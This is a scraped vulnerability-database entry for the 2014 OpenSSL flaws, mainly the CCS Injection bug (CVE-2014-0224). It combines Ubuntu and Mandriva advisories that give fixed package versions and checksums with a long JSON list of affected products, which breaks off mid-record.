3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux)
iEYEARECAAYFAlPk9ewACgkQ4B86/C0qfVn1/gCfR2U/mZZXYwPms9ptZcBTua/5 MoQAn1qlQ3kmLRs7YFN5GzwBTRfSK5Go =r0qe -----END PGP SIGNATURE----- . ============================================================================ Ubuntu Security Notice USN-2232-2 June 12, 2014
openssl regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 13.10
- Ubuntu 12.04 LTS
Summary:
USN-2232-1 introduced a regression in OpenSSL.
Software Description: - openssl: Secure Socket Layer (SSL) cryptographic library and tools
Details:
USN-2232-1 fixed vulnerabilities in OpenSSL. The upstream fix for CVE-2014-0224 caused a regression for certain applications that use tls_session_secret_cb, such as wpa_supplicant. This update fixes the problem.
Original advisory details:
J=C3=BCri Aedla discovered that OpenSSL incorrectly handled invalid DTLS fragments. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. (CVE-2014-0195) Imre Rad discovered that OpenSSL incorrectly handled DTLS recursions. (CVE-2014-0221) KIKUCHI Masashi discovered that OpenSSL incorrectly handled certain handshakes. A remote attacker could use this flaw to perform a man-in-the-middle attack and possibly decrypt and modify traffic. (CVE-2014-0224) Felix Gr=C3=B6bert and Ivan Fratri=C4=87 discovered that OpenSSL incorrectly handled anonymous ECDH ciphersuites. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. (CVE-2014-3470)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.3
Ubuntu 13.10: libssl1.0.0 1.0.1e-3ubuntu1.5
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.15
After a standard system update you need to reboot your computer to make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-2232-2 http://www.ubuntu.com/usn/usn-2232-1 https://launchpad.net/bugs/1329297
Package Information: https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.3 https://launchpad.net/ubuntu/+source/openssl/1.0.1e-3ubuntu1.5 https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.15 .
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the CCS Injection vulnerability (CVE-2014-0224).
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470 http://www.openssl.org/news/secadv_20140605.txt
Updated Packages:
Mandriva Enterprise Server 5: ef1687f8f4d68dd34149dbb04f3fccda mes5/i586/libopenssl0.9.8-0.9.8h-3.18mdvmes5.2.i586.rpm 3e46ee354bd0add0234eaf873f0a076c mes5/i586/libopenssl0.9.8-devel-0.9.8h-3.18mdvmes5.2.i586.rpm 0cc60393474d11a3786965d780e39ebc mes5/i586/libopenssl0.9.8-static-devel-0.9.8h-3.18mdvmes5.2.i586.rpm 16d367fe394b2f16b9f022ea7ba75a54 mes5/i586/openssl-0.9.8h-3.18mdvmes5.2.i586.rpm 223a4a6b80f1b2eb3cbfaf99473423f3 mes5/SRPMS/openssl-0.9.8h-3.18mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64: 85a51b41a45f6905ea778347d8b236c1 mes5/x86_64/lib64openssl0.9.8-0.9.8h-3.18mdvmes5.2.x86_64.rpm d0bf9ef6c6e33d0c6158add14cbe04b8 mes5/x86_64/lib64openssl0.9.8-devel-0.9.8h-3.18mdvmes5.2.x86_64.rpm 707842b93162409157667f696996f4fc mes5/x86_64/lib64openssl0.9.8-static-devel-0.9.8h-3.18mdvmes5.2.x86_64.rpm 70f4de1608d99c970afa1786595a761d mes5/x86_64/openssl-0.9.8h-3.18mdvmes5.2.x86_64.rpm 223a4a6b80f1b2eb3cbfaf99473423f3 mes5/SRPMS/openssl-0.9.8h-3.18mdvmes5.2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201406-0117", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "enterprise linux", "scope": "eq", "trust": 1.6, "vendor": "redhat", "version": "5" }, { "model": "storage", "scope": "eq", "trust": 1.3, "vendor": "redhat", "version": "2.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "2.3" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "0.9.8za" }, { "model": "enterprise linux", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "*" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "20" }, { "model": "linux enterprise desktop", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "leap", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "42.1" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "19" }, { "model": "linux enterprise software development kit", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "mariadb", "scope": "lt", "trust": 1.0, "vendor": "mariadb", "version": "10.0.13" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "mariadb", "scope": "gte", "trust": 1.0, "vendor": "mariadb", "version": "10.0.0" }, { "model": "linux enterprise workstation extension", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "linux enterprise server", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "13.2" }, { "model": "bladecenter advanced management module 3.66e", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "enterprise linux", "scope": "eq", "trust": 0.9, "vendor": "redhat", "version": "6" }, { "model": "fedora", "scope": null, "trust": 0.8, "vendor": "fedora", "version": null }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "3.0 (ibm pureapplication system and xen)" }, { "model": "api management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "3.0 (vmware)" }, { "model": "hardware management console", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7 release 7.6.0 sp3" }, { "model": "hardware management console", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7 release 7.7.0 sp3" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "patient hub 10.0" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "provider hub 10.0" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "standard/advanced edition 11.0" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "standard/advanced edition 11.3" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "10.0" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "10.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "9.0" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "9.2" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "9.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "9.7" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "patient hub 9.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "patient hub 9.7" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "provider hub 9.5" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "provider hub 9.7" }, { "model": "mobile messaging \u0026 m2m", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "client pack (linux and windows for platforms eclipse paho mqtt c client library ) of support pac ma9b" }, { "model": "sdk,", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "for node.js 1.1.0.3" }, { "model": "security access manager for mobile the appliance", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.0" }, { "model": "security access manager for web the appliance", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.0" }, { "model": "security access manager for web the appliance", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "8.0" }, { "model": "smartcloud orchestrator", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.3" }, { "model": "smartcloud orchestrator", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.3 fp1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.1 for ibm provided software virtual appliance" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "2.3 fp1" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "4.1.1 (linux-ix86 and linux-s390)" }, { "model": "tivoli workload scheduler", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "distributed 8.4.0 fp07" }, { "model": "tivoli workload scheduler", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "distributed 8.5.0 fp04" }, { "model": "tivoli workload scheduler", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "distributed 8.5.1 fp05" }, { "model": "tivoli workload scheduler", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "distributed 8.6.0 fp03" }, { "model": "tivoli workload scheduler", "scope": "lte", "trust": 0.8, "vendor": "ibm", "version": "distributed 9.1.0 fp01" }, { "model": "tivoli workload scheduler", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "distributed 9.2.0 ga level" }, { "model": "websphere mq", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.1 (linux and windows for platforms paho mqtt c client library )" }, { "model": "websphere mq", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "7.5 (linux and windows for platforms paho mqtt c client library )" }, { "model": "websphere mq", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for hp nonstop server 5.3.1" }, { "model": "tivoli composite application manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for transactions 7.2" }, { "model": "tivoli composite application manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for transactions 7.3" }, { "model": "tivoli composite application manager", "scope": "eq", "trust": 0.8, "vendor": "ibm", "version": "for transactions 7.4" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "0.9.8 thats all 0.9.8za" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0 thats all 1.0.0m" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1 thats all 1.0.1h" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.7.5" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.8.5" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.9 to 10.9.4" }, { "model": "mac os x server", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.7.5" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.63" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.71" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 5.0" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 5.1" }, { "model": "vm virtualbox", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "3.2.24" }, { "model": "vm virtualbox", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "4.0.26" }, { "model": "vm virtualbox", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "4.1.34" }, { "model": "vm virtualbox", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "4.2.26" }, { "model": "vm virtualbox", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "4.3.14" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "5" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "6" }, { "model": "storage", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "2.1" }, { "model": "l20/300", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "lto6 drive", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "lx/30a", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "integrated system ha database ready", "scope": null, "trust": 0.8, "vendor": "fujitsu", "version": null }, { "model": "symfoware", "scope": "eq", "trust": 0.8, "vendor": "fujitsu", "version": "analytics server" }, { "model": "symfoware", "scope": "eq", "trust": 0.8, "vendor": "fujitsu", "version": "server" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "one-x mobile sip for ios", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.2" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "one-x mobile sip for ios", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "0.9.8v" }, { "model": "one-x mobile sip for ios", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2" }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "one-x mobile sip for ios", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.3" }, { "model": "one-x mobile sip for ios", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.4" }, { "model": "one-x mobile sip for ios", "scope": "eq", "trust": 0.6, "vendor": "avaya", "version": "6.2.1" }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.3" }, { "model": "chrome for android", "scope": "ne", "trust": 0.3, "vendor": "google", "version": "35.0.1916.141" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.6" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v210.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "arx", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.6.1" }, { "model": "cp1543-1", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ace application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1.3" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "point software check point security gateway r71", "scope": null, "trust": 0.3, "vendor": "check", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "9.1-release-p15", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.7" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "vpn client v100r001c02spc702", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "one-x communicator for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.2" }, { "model": "release-p4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "manageone v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "firepass", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "tivoli workload scheduler distributed ga level", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "10.0-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "prime access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "tivoli netcool/system service monitor fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "agile controller v100r001c00spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.1--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "smart update manager for linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3.5" }, { "model": "mds switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.3" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2.2" }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.2" }, { "model": "db2 workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "updatexpress system packs installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.61" }, { "model": "usg5000 v300r001c10sph201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.3" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "asg2000 v100r001c10sph001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "wireless lan controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "client applications", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "vsm v200r002c00spc503", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "big-ip edge gateway", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.4" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "s5900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "watson explorer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0" }, { "model": "documentum content server p05", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "jabber video for telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "tivoli workload scheduler distributed fp05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tivoli workload scheduler distributed fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "snapdrive for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "10.0-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "one-x communicator for mac os", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "x1.0.5" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3200" }, { "model": "s2750\u0026s5700\u0026s6700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "linerate", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "1.6.1" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "9.2-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "advanced settings utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "9.1-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "automation stratix", "scope": "ne", "trust": 0.3, "vendor": "rockwell", "version": "590015.6.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "nexus series fabric extenders", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "20000" }, { "model": "intelligencecenter", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.2" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.2" }, { "model": "documentum content server p02", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "big-iq cloud", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "communicator for android", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "oncommand workflow automation", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "enterprise manager", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "3.0" }, { "model": "desktop collaboration experience dx650", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "automation stratix", "scope": "eq", "trust": 0.3, "vendor": "rockwell", "version": "59000" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": 